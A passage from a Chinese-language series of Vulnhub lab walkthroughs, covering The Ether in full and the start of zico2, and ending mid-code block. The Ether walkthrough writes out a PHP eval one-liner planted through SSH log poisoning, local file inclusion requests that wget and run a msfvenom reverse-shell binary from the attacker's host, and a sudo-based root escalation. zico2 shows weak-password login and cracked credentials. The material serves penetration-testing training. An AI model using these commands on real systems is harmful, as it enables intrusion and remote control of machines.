直接查看/root下的文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_53.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>讀取flag文件,得到flag</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_54.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h1><a name='header-n8868' class='md-header-anchor '></a>第八節 The Ether</h1><h2><a name='header-n8869' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8870' class='md-header-anchor '></a>下載鏈接</h3><p><a href='http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip' target='_blank' class='url'>http://www.mediafire.com/file/502nbnbkarsoisb/theEther.zip</a></p><h3><a name='header-n8873' class='md-header-anchor '></a>運行環境</h3><ul><li>​本靶機提供了VMware的鏡像,從Vulnhub下載之后解壓,運行<code>vmx</code>文件即可</li><li>靶機:本靶機默認使用了自動獲取的上網模式。運行靶機之后,將會橋接到物理網卡,接入網絡。</li><li>攻擊機:Kali虛擬機運行於virtualbox,同樣使用橋接模式,即可訪問靶機。</li></ul><h3><a name='header-n8884' class='md-header-anchor '></a>靶機說明</h3><p>本靶機有一定難度,不適合初學者。</p><p>本靶機的滲透目標為滲透進靶機並且找到系統中隱藏的Flag值。</p><p>官方提供了一個提示:靶機中有一個相關的文件,在滲透過程中發揮重要作用,但是不要浪費時間試圖去解密這個混淆后的文件。</p><h2><a name='header-n8891' class='md-header-anchor '></a>信息收集</h2><ul><li>ip發現</li></ul><p>首先看一下Kali的網絡配置。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277606485214.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用fping發現靶機。<code>fping -asg 192.168.1.0/24</code>發現有本網段有四個相關IP。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277612581371.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>端口掃描與服務識別</li></ul><p>使用nmap快速掃描選項(<code>-F</code>參數)掃描<code>192.168.1.0/24</code>網段</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277613128019.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據<code>Mac</code>可以很明顯的區分,<code>192.168.1.1</code>為TP-Link路由器,<code>192.168.1.100</code>為蘋果設備,<code>192.168.1.101</code>為VMware虛擬機。可以確定<code>192.168.1.101</code>為目標靶機的IP。</p><p>確定目標IP之后,使用Nmap對目標進行更加詳細的探測:
<code>nmap -A -v 192.168.1.101 -oN nmap.txt</code></p><p>解釋一下相關參數:</p><ul><li><code>-A</code> 詳細掃描目標IP,加載所有腳本,盡可能全面的探測信息;</li><li><code>-v</code> 顯示詳細的掃描過程;</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277637460813.jpg' alt='' referrerPolicy='no-referrer' /></li></ul><ul><li>威脅建模</li></ul><p>分析nmap的掃描結果,發現靶機只開放了<code>22</code>和<code>80</code>端口,系統為<code>Ubuntu</code>。<code>22</code>端口為<code>SSH</code>服務,<code>80</code>端口為<code>http</code>服務,Web容器為<code>Apache/2.4.18</code>。</p><p>通常Web會存在各種各樣的問題,經過初步分析,以Web作為初步的滲透入口。</p><h2><a name='header-n8939' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n8940' class='md-header-anchor '></a>1. 使用niktoWeb漏洞掃描器</h3><p>使用nikto工具掃描Web漏洞,<code>nikto -h 192.168.1.101</code>,<code>-h</code>參數指定掃描目標。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277621096032.jpg' alt='' referrerPolicy='no-referrer' /></p><p>沒有發現什么明顯的高危漏洞,發現了<code>images</code>目錄和<code>/icons/README</code>文件,沒有什么利用價值。</p><h3><a name='header-n8946' class='md-header-anchor '></a>2. 使用dirb掃描網站目錄</h3><p><code>dirb http://192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277623420335.jpg' alt='' referrerPolicy='no-referrer' /></p><p>除了部分靜態文件,沒有發現有價值的利用點。</p><h3><a name='header-n8953' class='md-header-anchor '></a>3. 瀏覽網站功能</h3><p>根據前兩步基本的信息探測,並沒有發現漏洞點。手動訪問網站,分析網站功能。</p><p>點擊<code>ABOUT US</code>鏈接后,發現URL為:<code>http://192.168.1.101/?file=about.php</code>,存在任意文件包含的可能。</p><h3><a name='header-n8958' class='md-header-anchor '></a>4. 文件包含漏洞測試</h3><p>為了直觀的看到測試結果,這里使用Burpsuite處理http請求。</p><p>通過嘗試包含Linux系統的配置文件,發現存在一定的限制。</p><p>如:包含<code>/etc/passwd</code>發現沒有結果。
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277629489901.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后測試了幾個常見的Apache日志的路徑:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache/access.log</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/www/logs/access.log</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/access.log</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p>均無結果。</p><p>猜測可能是更改了配置文件的路徑,嘗試讀Apache2的配置文件,<code>/etc/apache2/apache2.conf</code>,發現也是失敗。</p><p>嘗試通過php偽協議讀取php文件源碼,也無果。</p><p><code>file=php://filter/convert.base64-encode/resource=index.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277632154094.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據之前整理的文件包含漏洞筆記利用思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277635091513.jpg' alt='' referrerPolicy='no-referrer' /></p><p>結合之前信息探測的結果,靶機只開通了<code>http</code>與<code>ssh</code>服務。Apache的日志包含失敗,嘗試包含ssh的登陸日志。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277638432449.jpg' alt='' referrerPolicy='no-referrer' /></p><p>成功讀到ssh的登陸日志。</p><h2><a name='header-n8989' class='md-header-anchor '></a>獲取shell</h2><h3><a name='header-n8990' class='md-header-anchor '></a>1. 獲取一句話Webshell</h3><p>使用一句話作為用戶名登陸靶機的ssh。</p><p><code>ssh '<?php eval($_GET['f']); ?>'@192.168.1.101</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277640398321.jpg' alt='' referrerPolicy='no-referrer' /></p><p>SSH的日志會記錄此次登陸行為,這樣就可以把一句話寫入ssh的日志文件。測試一下是否成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277643786689.jpg' alt='' referrerPolicy='no-referrer' /></p><p>可以看到一句話已經成功寫入。</p><h3><a name='header-n9003' class='md-header-anchor '></a>2. msfvenom生成Meterpreter shell</h3><p>平時使用Msf比較多,這里也以Msf作為接下來主要的滲透工具。</p><p>首先生成Linux平台的shell程序。</p><p><code>msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=4444 -f elf > shell.elf</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277683325190.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9012' class='md-header-anchor '></a>3. Metasploit 設置監聽</h3><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">use exploit/multi/handler</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set payload linux/x86/meterpreter/reverse_tcp</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">set lhost 192.168.1.102</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">exploit</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 100px;"></div><div class="CodeMirror-gutters" style="display: none; height: 130px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699437724.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9016' class='md-header-anchor '></a>4. 種植Meterpreter shell</h3><p>首先使用Python搭建一個簡單的Web Server:<code>python -m SimpleHTTPServer 80</code></p><p>之后利用前面獲得的一句話,執行命令,下載生成的木馬,並且運行。</p><p>分別發送以下請求:</p><ol start='' ><li><code>/?file=/var/log/auth.log&f=system('wget+192.168.1.102/shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('chmod+%2bx+shell.elf')%3b</code></li><li><code>/?file=/var/log/auth.log&f=system('./shell.elf')%3b</code></li></ol><p>注意:</p><ol start='' ><li>因為要執行的命令里面有空格、加號等符號,要將payload進行urlencode之后才可以正常執行。</li><li>因為生成的木馬文件沒有執行權限,下載到靶機后也無法執行,所以需要先給<code>shell.elf</code>添加執行權限,之后再執行。</li></ol><p>執行結果:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277699964066.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Web Server及msf的結果:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277706402332.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h2><a name='header-n9052' class='md-header-anchor '></a>提升權限</h2><p>Linux提權的基本思路:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277780553156.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9057' class='md-header-anchor '></a>1. 溢出提權</h3><p>現在拿到了目標靶機的Meterpreter shell,簡單的看下信息。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277711519803.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現系統為<code>Ubuntu 16.04 (Linux 4.10.0-40-generic)</code>,前段時間爆了Ubuntu16.04提權的exp,在這里試一試。</p><p>exp 地址:<a href='https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c' target='_blank' class='url'>https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c</a></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277744279712.jpg' alt='' referrerPolicy='no-referrer' /></p><p>提權失敗。</p><h3><a name='header-n9070' class='md-header-anchor '></a>2. 使用msf提權</h3><p><code>use post/multi/recon/local_exploit_suggester</code></p><p>沒有發現可以利用的提權漏洞。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277748088090.jpg' alt='' referrerPolicy='no-referrer' /></p><p> </p><h3><a name='header-n9079' class='md-header-anchor '></a>3. 錯誤的SUID文件提權</h3><p>進入交互式shell,派生一個bash的shell:
<code>python -c 'import pty;pty.spawn("/bin/bash")'</code></p><p>在Web的目錄中發現了<code>xxxlogauditorxxx.py</code>,這是不應該存在的,猜測是題目所指的特殊文件,而且該文件特別大。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277741330578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>運行一下該py文件,發現是審計日志的程序。
查看Apache2的日志文件,發現是執行了<code>cat</code>命令,但是因為權限不夠,沒有執行成功。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277716185341.jpg' alt='' referrerPolicy='no-referrer' /></p><p>仔細查看py文件的權限,發現具有SUID的權限,且文件所屬用戶為root。</p><p><code>sudo --list</code>查看一下用戶權限。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277721141332.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現可以不使用密碼即可以root權限運行該py文件。這就好辦多了。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277722533145.jpg' alt='' referrerPolicy='no-referrer' /></p><p>該py文件的配置錯誤,導致可以直接以root權限執行命令。</p><p>接下來拿root權限的shell。</p><h3><a name='header-n9106' class='md-header-anchor '></a>4. 獲取root權限的shell</h3><p>因為之前已經上傳了Msfvenom生成的馬,這里再次使用。首先退出<code>shell</code>,<code>background</code>命令調入后台,然后再次開啟監聽,並且置於后台。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277724353655.jpg' alt='' referrerPolicy='no-referrer' /></p><p>利用發現的特殊文件以root權限運行msf木馬。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">sudo ./xxxlogauditorxxx.py</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/var/log/apache2/access.log|./shell.elf</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277726121084.jpg' alt='' referrerPolicy='no-referrer' /></p><p>運行py之后,顯示出現問題,不過不影響運行木馬。</p><p>進入session 2的shell,查看權限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277727104925.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9122' class='md-header-anchor '></a>獲取flag</h2><p>在root的家目錄發現了<code>flag.png</code>文件:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729121417.jpg' alt='' referrerPolicy='no-referrer' /></p><p>下載到本地進行分析:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729313511.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277729611404.jpg' alt='' referrerPolicy='no-referrer' /></p><p>推測接下來的考點屬於圖片隱寫。</p><p>經過分析,在圖片文件的末尾發現了一串base64</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277730366648.jpg' alt='' referrerPolicy='no-referrer' /></p><p>將base64寫入<code>flag.txt</code>,進行解碼后get flag:</p><p><code>cat flag | base64 -d</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277731880443.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9145' class='md-header-anchor '></a>靶場思路回顧</h2><p>至此,已經完成最終目標,回頭分析一下之前幾個失敗的點。</p><h3><a name='header-n9148' class='md-header-anchor '></a>1. Web方面利用失敗原因</h3><p>首先看一下index.php的核心代碼:</p><pre class="md-fences md-end-block" lang="" style="break-inside: unset;"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><?php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = $_GET["file"];</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("etc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("php:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("expect:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("data:","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("proc","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("home","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">$file = str_ireplace("opt","", $file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">if ($file == "/var/log/auth.log") {</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">header("location: index.php");</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">else{</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">}</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">include($file);</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">?></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 468px;"></div><div class="CodeMirror-gutters" style="display: none; height: 498px;"></div></div></div></pre><p>可以看到<code>index.php</code>將一些關鍵詞置空了。</p><p>所以,之前利用不成功的點原因如下:</p><ul><li>偽協議讀文件失敗</li></ul><p>過濾了<code>php:</code>且大小寫敏感,故不能使用偽協議讀文件。</p><ul><li>讀取配置文件、passwd文件等失敗</li></ul><p>過濾了<code>etc</code>,無法讀取任何配置文件</p><ul><li>讀取Apache訪問日志失敗。</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/nine/15277596742208/15277739100061.jpg' alt='' referrerPolicy='no-referrer' /></p><p>因權限問題,<code>www-data</code>用戶無法寫入和讀取Apache的日志文件。故,包含Apache日志失敗。</p><h3><a name='header-n9176' class='md-header-anchor '></a>2. 系統方面利用失敗原因</h3><ul><li>溢出提權失敗</li></ul><p>通過分析報錯,原因可能是因為靶機系統為32位,但exp只支持64位系統。</p><h2><a name='header-n9183' class='md-header-anchor '></a>思路總結</h2><p>突破點總結:</p><ol start='' ><li>PHP本地文件包含漏洞發現</li><li>SSH日志寫入一句話</li><li>利用LFI和SSH日志getshell</li><li>MSF生成木馬,利用一句話植入、運行</li><li>利用錯誤配置SUID程序提權</li></ol><p>在完成這次靶場的過程中,可以有很多發散的思路,比如:</p><ol start='' ><li>文件包含漏洞,可以使用字典Fuzz一下各種配置文件。</li><li>使用NC或者其他反彈shell的姿勢反彈shell。</li></ol><p>此外,Metasploit Framework有很多方便實用的功能,如果能夠掌握,會大大簡化滲透的某些步驟,值得深入學習。</p><p>總體來說,此靶場設計比較簡單。一個Web,一個SSH,利用點無非這兩個,思路比較清晰,便於實踐者完成該靶場。</p><h1><a name='header-n9215' class='md-header-anchor '></a>第九節 zico2</h1><h2><a name='header-n9217' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n9218' class='md-header-anchor '></a>下載鏈接</h3><p> <a href='https://download.vulnhub.com/zico/zico2.ova' target='_blank' class='url'>https://download.vulnhub.com/zico/zico2.ova</a></p><h3><a name='header-n9221' class='md-header-anchor '></a>運行環境</h3><ul><li>​本靶機提供了OVA格式的鏡像,官方推薦使用virtualbox,從Vulnhub下載之后,導入到viirtualbox即可運行。</li><li>靶機:修改靶機的網絡配置為橋接模式。</li><li>攻擊機:Kali虛擬機,同樣使用橋接模式,即可訪問靶機。</li></ul><h3><a name='header-n9232' class='md-header-anchor '></a>靶機說明</h3><p>本靶機的難度為中等。</p><p>本靶機的滲透目標為滲透進靶機,拿到root權限,並讀取flag文件。</p><p>官方提供了一個提示:枚舉、枚舉、枚舉。</p><h2><a name='header-n9239' class='md-header-anchor '></a>信息收集</h2><ul><li><p>ip發現</p><p>首先看一下Kali的網絡配置。
  <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852282391.jpg' alt='' referrerPolicy='no-referrer' /></p><p>之后使用nmap發現靶機。<code>nmap -sP 192.168.1.0/24</code>發現有本網段有四個相關IP。</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307852529644.jpg' alt='' referrerPolicy='no-referrer' /></p></li><li><p>端口掃描與服務識別</p><p>使用nmap快速掃描選項(<code>-F</code>參數)掃描<code>192.168.1.0/24</code>網段</p><p> <img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307853380399.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據<code>Mac</code>可以很明顯的區分,<code>192.168.1.3</code>為運行在VirtualBox上的虛擬機,即我們構建的靶機。</p><p>確定目標IP之后,使用Nmap對目標進行更加詳細的探測:
<code>nmap -A -v 192.168.1.3 -oN nmap.txt</code></p><p>解釋一下相關參數:</p><ul><li><code>-A</code> 詳細掃描目標IP,加載所有腳本,盡可能全面的探測信息;</li><li><code>-v</code> 顯示詳細的掃描過程;</li><li><code>-oN</code> 將掃描結果以普通文本的格式輸出到<code>nmap.txt</code>。
結果如下:
<img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307855078046.jpg' alt='' referrerPolicy='no-referrer' /></li></ul></li></ul><ul><li><p>威脅建模</p><p>分析nmap的掃描結果,發現靶機開放了<code>22</code>和<code>80</code>,<code>111</code>端口,系統為<code>Linux</code>。<code>22</code>端口為<code>SSH</code>服務,<code>80</code>端口為<code>http</code>服務,Web容器為<code>Apache/2.2.22</code>。</p><p>通常Web會存在各種各樣的問題,經過初步分析,以Web作為初步的滲透入口。</p></li></ul><h2><a name='header-n9286' class='md-header-anchor '></a>Web漏洞挖掘</h2><h3><a name='header-n9287' class='md-header-anchor '></a>1. 使用dirb掃描網站目錄</h3><p><code>dirb http://192.168.1.3</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307858659578.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現敏感目錄<code>dbadmin</code></p><h3><a name='header-n9294' class='md-header-anchor '></a>2. 目錄遍歷漏洞</h3><p>訪問<code>http://192.168.1.3/dbadmin/</code>,發現目錄遍歷了,同時存在<code>test_db.php</code>文件。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307859615079.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9299' class='md-header-anchor '></a>3. 弱口令</h3><p>訪問<code>http://192.168.1.3/dbadmin/test_db.php</code>,發現是類似於MySQL的phpmyadmin,靶機的這個是sqlite的網頁版管理。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307860283151.jpg' alt='' referrerPolicy='no-referrer' /></p><p>嘗試弱口令<code>admin</code>即可進入。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307865109650.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n9308' class='md-header-anchor '></a>4. phpLiteAdmin的信息收集</h3><p>查看原有的數據庫,發現里面存在兩個賬號,使用somd5.com 解密。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/11/media/15307849041021/15307883468354.jpg' alt='' referrerPolicy='no-referrer' /></p><p>得到以下信息:</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root 34kroot34</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">zico zico2215@</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 